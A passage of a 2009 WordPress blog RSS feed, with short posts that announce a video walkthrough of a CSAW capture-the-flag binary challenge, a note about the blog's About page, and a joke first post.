<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/lordparody.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/lordparody.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/lordparody.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/lordparody.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/lordparody.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/lordparody.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/lordparody.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/lordparody.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/lordparody.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/lordparody.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/lordparody.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/lordparody.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/lordparody.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/lordparody.wordpress.com/17/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lordparody.wordpress.com&amp;blog=9056582&amp;post=17&amp;subd=lordparody&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://lordparody.wordpress.com/2009/11/21/csaw-ctf-video-2/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/4cae792c55df6bb7b3f401bbb280ce13?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">lordparody</media:title>
		</media:content>
	</item>
		<item>
		<title>CSAW CTF video #1</title>
		<link>http://lordparody.wordpress.com/2009/11/19/9/</link>
		<comments>http://lordparody.wordpress.com/2009/11/19/9/#comments</comments>
		<pubDate>Thu, 19 Nov 2009 15:36:05 +0000</pubDate>
		<dc:creator>lordparody</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://lordparody.wordpress.com/?p=9</guid>
		<description><![CDATA[After the Capture the Flag event of CSAW, Stephen Ridley released the source and binaries for the challenges on his github at http://github.com/s7ephen/CSAW_2009 . I spent a couple hours and did the challenges and found them to be fun while still quite simple at times. Later challenges are a real challenge for me as they [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lordparody.wordpress.com&amp;blog=9056582&amp;post=9&amp;subd=lordparody&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>After the Capture the Flag event of CSAW, Stephen Ridley released the source and binaries for the challenges on his github at http://github.com/s7ephen/CSAW_2009 . I spent a couple hours and did the challenges and found them to be fun while still quite simple at times. Later challenges are a real challenge for me as they require some coding to load libraries and I&#8217;ve not coded anything properly in years. <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Here is the first binary solution.  I may remake this video at a lower resolution so it will be easier to read.</p>
<span style="text-align:center; display: block;"><a href="http://lordparody.wordpress.com/2009/11/19/9/"><img src="http://img.youtube.com/vi/koek_42M1Mg/2.jpg" alt="" /></a></span>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/lordparody.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/lordparody.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/lordparody.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/lordparody.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/lordparody.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/lordparody.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/lordparody.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/lordparody.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/lordparody.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/lordparody.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/lordparody.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/lordparody.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/lordparody.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/lordparody.wordpress.com/9/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lordparody.wordpress.com&amp;blog=9056582&amp;post=9&amp;subd=lordparody&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://lordparody.wordpress.com/2009/11/19/9/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/4cae792c55df6bb7b3f401bbb280ce13?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">lordparody</media:title>
		</media:content>
	</item>
		<item>
		<title>Intention</title>
		<link>http://lordparody.wordpress.com/2009/11/06/intention/</link>
		<comments>http://lordparody.wordpress.com/2009/11/06/intention/#comments</comments>
		<pubDate>Fri, 06 Nov 2009 09:18:01 +0000</pubDate>
		<dc:creator>lordparody</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://lordparody.wordpress.com/2009/11/06/intention/</guid>
		<description><![CDATA[Moved this to the About page :] http://www.twitter.com/lordparody  I&#8217;ll update any new posts via twitter.<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lordparody.wordpress.com&amp;blog=9056582&amp;post=6&amp;subd=lordparody&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Moved this to the About page :]</p>
<p>http://www.twitter.com/lordparody  I&#8217;ll update any new posts via twitter.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/lordparody.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/lordparody.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/lordparody.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/lordparody.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/lordparody.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/lordparody.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/lordparody.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/lordparody.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/lordparody.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/lordparody.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/lordparody.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/lordparody.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/lordparody.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/lordparody.wordpress.com/6/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lordparody.wordpress.com&amp;blog=9056582&amp;post=6&amp;subd=lordparody&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://lordparody.wordpress.com/2009/11/06/intention/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/4cae792c55df6bb7b3f401bbb280ce13?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">lordparody</media:title>
		</media:content>
	</item>
		<item>
		<title>My Spoon is too big!</title>
		<link>http://lordparody.wordpress.com/2009/11/06/hello-world/</link>
		<comments>http://lordparody.wordpress.com/2009/11/06/hello-world/#comments</comments>
		<pubDate>Fri, 06 Nov 2009 07:58:48 +0000</pubDate>
		<dc:creator>lordparody</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[I am a Banana!<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lordparody.wordpress.com&amp;blog=9056582&amp;post=1&amp;subd=lordparody&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>I am a Banana!</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/lordparody.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/lordparody.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/lordparody.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/lordparody.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/lordparody.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/lordparody.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/lordparody.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/lordparody.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/lordparody.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/lordparody.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/lordparody.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/lordparody.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/lordparody.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/lordparody.wordpress.com/1/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lordparody.wordpress.com&amp;blog=9056582&amp;post=1&amp;subd=lordparody&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://lordparody.wordpress.com/2009/11/06/hello-world/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/4cae792c55df6bb7b3f401bbb280ce13?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">lordparody</media:title>
		</media:content>
	</item>
	</channel>
</rss>
